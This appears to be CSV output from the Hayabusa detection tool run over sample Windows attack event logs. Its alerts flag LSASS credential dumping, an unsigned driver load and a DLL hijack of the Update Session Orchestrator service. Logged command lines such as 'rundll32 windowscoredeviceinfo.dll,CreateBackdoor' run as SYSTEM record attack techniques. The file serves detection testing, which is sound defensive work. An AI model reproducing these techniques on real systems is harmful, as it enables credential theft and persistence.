+2020-02-10 19:08:25.164 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Suspicious ImageLoad - Possible Memdump | Image: C:\Windows\System32\dbgcore.dll | Process: C:\Windows\System32\lsass.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 624 | PGUID: 747F3D96-A042-5E41-0000-0010E4560000 | Hash: SHA1=E3FA87C983008D4D2A5D31708415F88548FC7702,MD5=88E88D8C1C663769BDD722000A7EB5A7,SHA256=C84BECA73EA45D3C53D9C42CD6A37CC0CC07FF57D9CFEE113CDF70F640572AEF,IMPHASH=9D75F08EA29885182B136CE4FF854114",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx
+2020-02-10 19:08:25.193 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Suspicious ImageLoad - Possible Memdump | Image: C:\Windows\System32\dbghelp.dll | Process: C:\Windows\System32\lsass.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 624 | PGUID: 747F3D96-A042-5E41-0000-0010E4560000 | Hash: SHA1=8B5BC2EAA00C530DF0FF139635E428FA4C5D7AA8,MD5=B0A68C5BB8D5493F1AF967F0FDD80382,SHA256=2CF0972DC8A67D863AD1A6205B66C80865ACC11F7E3F67B4A76C162655EE0FEE,IMPHASH=AB902346D2BD8706EE70C87E00136BAC",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx
+2020-02-10 19:08:25.193 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Suspicious ImageLoad - Possible Memdump | Image: C:\Windows\System32\dbghelp.dll | Process: C:\Windows\System32\lsass.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 624 | PGUID: 747F3D96-A042-5E41-0000-0010E4560000 | Hash: SHA1=8B5BC2EAA00C530DF0FF139635E428FA4C5D7AA8,MD5=B0A68C5BB8D5493F1AF967F0FDD80382,SHA256=2CF0972DC8A67D863AD1A6205B66C80865ACC11F7E3F67B4A76C162655EE0FEE,IMPHASH=AB902346D2BD8706EE70C87E00136BAC",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx
+2020-02-10 19:08:27.797 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\Public\BYOV\ZAM64\ppldump.exe | PID: 5016 | PGUID: 747F3D96-2B98-5E41-0000-00109C904700,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx
+2020-02-11 20:05:37.148 +09:00,MSEDGEWIN10,6,medium,Evas,Driver Loaded_Unsigned,"Path: C:\Windows\System32\drivers\RwDrv.sys | Status: Valid | Hash: SHA1=66E95DAEE3D1244A029D7F3D91915F1F233D1916,MD5=60E84516C6EC6DFDAE7B422D1F7CAB06,SHA256=D969845EF6ACC8E5D3421A7CE7E244F419989710871313B04148F9B322751E5D,IMPHASH=955E7B12A8FA06444C68E54026C45DE1",rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_UEFI_Settings_rweverything_sysmon_6.evtx
+2020-02-11 20:05:37.148 +09:00,MSEDGEWIN10,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\drivers\RwDrv.sys | Signature: ChongKim Chan,rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_UEFI_Settings_rweverything_sysmon_6.evtx
+2020-03-07 22:17:39.984 +09:00,MSEDGEWIN10,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_SeImpersonatePriv_enabled_back_for_upnp_localsvc_4698.evtx
+2020-03-09 07:11:34.340 +09:00,MSEDGEWIN10,4656,critical,CredAccess,LSASS Access from Non System Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx
+2020-03-09 07:11:34.340 +09:00,MSEDGEWIN10,4656,high,CredAccess,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx
+2020-03-09 07:11:34.340 +09:00,MSEDGEWIN10,4663,high,CredAccess,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx
+2020-03-21 14:00:16.296 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: usoclient StartInteractiveScan | Process: C:\Windows\System32\UsoClient.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2935f | PID: 2276 | PGUID: 747F3D96-9F60-5E75-0000-001081BE1D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:16.507 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Persistence - Suspicious Schedule.Service Module Load | Image: C:\Windows\System32\taskschd.dll | Process: C:\Windows\System32\svchost.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 7696 | PGUID: 747F3D96-9F60-5E75-0000-0010E7CC1D00 | Hash: SHA1=60FC364639C2264F76A00B153AC153751CC179F8,MD5=33446D4A3C3F2A2CD1051F91649C02C3,SHA256=DEBD522F85D48FD8244F67B478DE85167F0EDE6C341E3F3A0272BEB8D984477E,IMPHASH=8C2ED772723C9E5FAEA539B0F8C1C8E7",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:17.016 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Persistence - Suspicious Schedule.Service Module Load | Image: C:\Windows\System32\taskschd.dll | Process: C:\Windows\System32\svchost.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 4696 | PGUID: 747F3D96-9F60-5E75-0000-00104ADA1D00 | Hash: SHA1=60FC364639C2264F76A00B153AC153751CC179F8,MD5=33446D4A3C3F2A2CD1051F91649C02C3,SHA256=DEBD522F85D48FD8244F67B478DE85167F0EDE6C341E3F3A0272BEB8D984477E,IMPHASH=8C2ED772723C9E5FAEA539B0F8C1C8E7",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:17.980 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:17.980 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 4848 | PGUID: 747F3D96-9F61-5E75-0000-0010686A1E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:17.982 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:17.992 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 8116 | PGUID: 747F3D96-9F61-5E75-0000-0010736B1E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:17.996 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:17.997 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 6620 | PGUID: 747F3D96-9F61-5E75-0000-00109B6C1E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:17.998 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 4848 | PGUID: 747F3D96-9F61-5E75-0000-0010686A1E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:18.003 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 8116 | PGUID: 747F3D96-9F61-5E75-0000-0010736B1E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:18.005 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:18.007 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 7124 | PGUID: 747F3D96-9F61-5E75-0000-00103D6F1E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:18.011 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 6620 | PGUID: 747F3D96-9F61-5E75-0000-00109B6C1E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:18.011 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:18.014 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 7380 | PGUID: 747F3D96-9F61-5E75-0000-001056711E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:18.018 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 7124 | PGUID: 747F3D96-9F61-5E75-0000-00103D6F1E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:18.024 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 7380 | PGUID: 747F3D96-9F61-5E75-0000-001056711E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:18.042 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:18.046 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 8076 | PGUID: 747F3D96-9F61-5E75-0000-001059841E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:18.050 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 8076 | PGUID: 747F3D96-9F61-5E75-0000-001059841E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:19.873 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Suspicious ImageLoad - Possible Memdump | Image: C:\Windows\System32\dbghelp.dll | Process: C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.17763.1090_none_5715d73398f9ea47\TiWorker.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 6420 | PGUID: 747F3D96-9F63-5E75-0000-0010BCD01F00 | Hash: SHA1=8B5BC2EAA00C530DF0FF139635E428FA4C5D7AA8,MD5=B0A68C5BB8D5493F1AF967F0FDD80382,SHA256=2CF0972DC8A67D863AD1A6205B66C80865ACC11F7E3F67B4A76C162655EE0FEE,IMPHASH=AB902346D2BD8706EE70C87E00136BAC",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:19.877 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Suspicious ImageLoad - Possible Memdump | Image: C:\Windows\System32\dbgcore.dll | Process: C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.17763.1090_none_5715d73398f9ea47\TiWorker.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 6420 | PGUID: 747F3D96-9F63-5E75-0000-0010BCD01F00 | Hash: SHA1=E3FA87C983008D4D2A5D31708415F88548FC7702,MD5=88E88D8C1C663769BDD722000A7EB5A7,SHA256=C84BECA73EA45D3C53D9C42CD6A37CC0CC07FF57D9CFEE113CDF70F640572AEF,IMPHASH=9D75F08EA29885182B136CE4FF854114",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.187 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.189 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 3300 | PGUID: 747F3D96-9F68-5E75-0000-001079652000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.192 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.195 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 7420 | PGUID: 747F3D96-9F68-5E75-0000-0010B9662000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.205 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 3300 | PGUID: 747F3D96-9F68-5E75-0000-001079652000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.209 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 7420 | PGUID: 00000000-0000-0000-0000-000000000000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.213 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
